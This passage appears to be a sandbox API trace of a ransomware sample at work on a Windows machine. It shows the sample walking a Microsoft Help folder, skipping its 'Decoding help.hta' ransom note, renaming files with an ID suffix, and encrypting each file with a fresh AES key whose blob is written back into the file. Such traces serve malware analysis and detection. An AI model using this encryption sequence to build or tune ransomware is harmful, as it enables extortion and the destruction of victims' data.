lpFindFileData=0xdf8fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0xfa72fc10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa72fc10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x20b63e30, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x746, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.EXCEL.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="MSEXCE~1._ID")) returned 1 [0040.354] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0040.354] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0040.355] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" [0040.355] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft help\\decoding help.hta")) returned 0x1 [0040.355] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.EXCEL.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0040.355] lstrlenW (lpString="MS.EXCEL.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned 45 [0040.355] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0040.355] FindNextFileW (in: hFindFile=0x5a5b30, lpFindFileData=0xdf8fd30 | out: lpFindFileData=0xdf8fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0xfa755d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa755d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x20b89f90, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.EXCEL.DEV.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="MSEXCE~2._ID")) returned 1 [0040.355] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0040.355] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0040.355] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" [0040.355] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft help\\decoding help.hta")) returned 0x1 [0040.355] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.EXCEL.DEV.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0040.355] lstrlenW (lpString="MS.EXCEL.DEV.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned 49 [0040.355] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0040.355] FindNextFileW (in: hFindFile=0x5a5b30, lpFindFileData=0xdf8fd30 | out: lpFindFileData=0xdf8fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.GRAPH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="MSGRAP~1._ID")) returned 1 [0040.355] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0040.355] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0040.355] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" [0040.355] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft help\\decoding help.hta")) returned 0x1 [0040.355] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.GRAPH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0040.355] lstrlenW (lpString="MS.GRAPH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned 45 [0040.355] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0040.355] FindNextFileW (in: hFindFile=0x5a5b30, lpFindFileData=0xdf8fd30 | out: lpFindFileData=0xdf8fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfd789af0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd789af0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd822070, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x14c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.GROOVE.14.1033.hxn", cAlternateFileName="MSGROO~1.HXN")) returned 1 [0040.355] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0040.356] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0040.356] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" [0040.356] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft help\\decoding help.hta")) returned 0x1 [0040.356] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.GROOVE.14.1033.hxn") returned -1 [0040.356] lstrlenW (lpString="MS.GROOVE.14.1033.hxn") returned 21 [0040.356] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0040.356] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0040.356] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.GROOVE.14.1033.hxn" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" [0040.356] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" [0040.356] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" [0040.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0040.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0040.358] CreateFileMappingA (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0040.358] CryptAcquireContextA (in: phProv=0xdf8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xdf8fcec*=0x3448500) returned 1 [0040.359] CryptGenKey (in: hProv=0x3448500, Algid=0x6610, dwFlags=0x1, phKey=0xdf8fce8 | out: phKey=0xdf8fce8*=0x5a5b70) returned 1 [0040.359] CryptExportKey (in: hKey=0x5a5b70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xdf8fbe4, pdwDataLen=0xdf8fce4 | out: pbData=0xdf8fbe4*, pdwDataLen=0xdf8fce4*=0x2c) returned 1 [0040.359] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x2d0000 [0040.361] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xdf8fbe4*, pdwDataLen=0xdf8fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xdf8fbe4*, pdwDataLen=0xdf8fcf8*=0x100) returned 1 [0040.361] CryptEncrypt (in: hKey=0x5a5b70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0xdf8fce4*=0x140, dwBufLen=0x140 | out: pbData=0x2d0000*, pdwDataLen=0xdf8fce4*=0x140) returned 1 [0040.361] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0040.362] CloseHandle (hObject=0x280) returned 1 [0040.362] CryptDestroyKey (hKey=0x5a5b70) returned 1 [0040.362] CryptReleaseContext (hProv=0x3448500, dwFlags=0x0) returned 1 [0040.362] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.362] WriteFile (in: hFile=0x27c, lpBuffer=0xdf8fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xdf8fcf8, lpOverlapped=0x0 | out: lpBuffer=0xdf8fbe4*, lpNumberOfBytesWritten=0xdf8fcf8*=0x100, lpOverlapped=0x0) returned 1 [0040.363] WriteFile (in: hFile=0x27c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xdf8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xdf8fcf8*=0x500, lpOverlapped=0x0) returned 1 [0040.363] CloseHandle (hObject=0x27c) returned 1 [0040.364] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0040.364] FindNextFileW (in: hFindFile=0x5a5b30, lpFindFileData=0xdf8fd30 | out: lpFindFileData=0xdf8fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11446a50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.INFOPATH.14.1033.hxn", cAlternateFileName="MSINFO~1.HXN")) returned 1 [0040.364] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0040.364] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0040.364] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" [0040.364] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft help\\decoding help.hta")) returned 0x1 [0040.364] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.INFOPATH.14.1033.hxn") returned -1 [0040.364] lstrlenW (lpString="MS.INFOPATH.14.1033.hxn") returned 23 [0040.364] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0040.364] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0040.364] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.INFOPATH.14.1033.hxn" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" [0040.364] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" [0040.364] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" [0040.365] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.185] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0041.185] CreateFileMappingA (hFile=0x324, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3dc [0041.185] CryptAcquireContextA (in: phProv=0xdf8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xdf8fcec*=0x3449358) returned 1 [0043.828] CryptGenKey (in: hProv=0x3449358, Algid=0x6610, dwFlags=0x1, phKey=0xdf8fce8 | out: phKey=0xdf8fce8*=0x5d8650) returned 1 [0043.828] CryptExportKey (in: hKey=0x5d8650, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xdf8fbe4, pdwDataLen=0xdf8fce4 | out: pbData=0xdf8fbe4*, pdwDataLen=0xdf8fce4*=0x2c) returned 1 [0043.829] MapViewOfFile (hFileMappingObject=0x3dc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x4430000 [0044.097] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xdf8fbe4*, pdwDataLen=0xdf8fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xdf8fbe4*, pdwDataLen=0xdf8fcf8*=0x100) returned 1 [0046.902] CryptEncrypt (in: hKey=0x5d8650, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4430000*, pdwDataLen=0xdf8fce4*=0x140, dwBufLen=0x140 | out: pbData=0x4430000*, pdwDataLen=0xdf8fce4*=0x140) returned 1 [0046.902] UnmapViewOfFile (lpBaseAddress=0x4430000) returned 1 [0046.904] CloseHandle (hObject=0x3dc) returned 1 [0046.904] CryptDestroyKey (hKey=0x5d8650) returned 1 [0046.904] CryptReleaseContext (hProv=0x3449358, dwFlags=0x0) returned 1 [0046.904] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.904] WriteFile (in: hFile=0x324, lpBuffer=0xdf8fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xdf8fcf8, lpOverlapped=0x0 | out: lpBuffer=0xdf8fbe4*, lpNumberOfBytesWritten=0xdf8fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.905] WriteFile (in: hFile=0x324, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xdf8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xdf8fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.905] CloseHandle (hObject=0x324) returned 1 [0046.906] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.907] FindNextFileW (in: hFindFile=0x5a5b30, lpFindFileData=0xdf8fd30 | out: lpFindFileData=0xdf8fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1146cbb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.INFOPATHEDITOR.14.1033.hxn", cAlternateFileName="MSINFO~2.HXN")) returned 1 [0046.907] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0046.907] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0046.907] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" [0046.907] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft help\\decoding help.hta")) returned 0x1 [0046.907] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.INFOPATHEDITOR.14.1033.hxn") returned -1 [0046.907] lstrlenW (lpString="MS.INFOPATHEDITOR.14.1033.hxn") returned 29 [0046.907] lstrcmpiW (lpString1="[ID]", lpString2=".hxn") returned 1 [0046.907] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0046.907] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0046.907] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.INFOPATHEDITOR.14.1033.hxn" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" [0046.907] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" [0046.907] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" [0046.907] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.907] FindNextFileW (in: hFindFile=0x5a5b30, lpFindFileData=0xdf8fd30 | out: lpFindFileData=0xdf8fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1604c8f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.MSACCESS.14.1033.hxn", cAlternateFileName="MSMSAC~1.HXN")) returned 1 [0046.907] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0046.907] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0046.907] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" [0046.907] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft help\\decoding help.hta")) returned 0x1 [0046.908] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.MSACCESS.14.1033.hxn") returned -1 [0046.908] lstrlenW (lpString="MS.MSACCESS.14.1033.hxn") returned 23 [0046.908] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0046.908] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0046.908] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.MSACCESS.14.1033.hxn" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" [0046.908] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" [0046.908] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" [0046.908] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.908] FindNextFileW (in: hFindFile=0x5a5b30, lpFindFileData=0xdf8fd30 | out: lpFindFileData=0xdf8fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1604c8f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.MSACCESS.DEV.14.1033.hxn", cAlternateFileName="MSMSAC~2.HXN")) returned 1 [0046.908] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0046.908] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0046.908] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta") 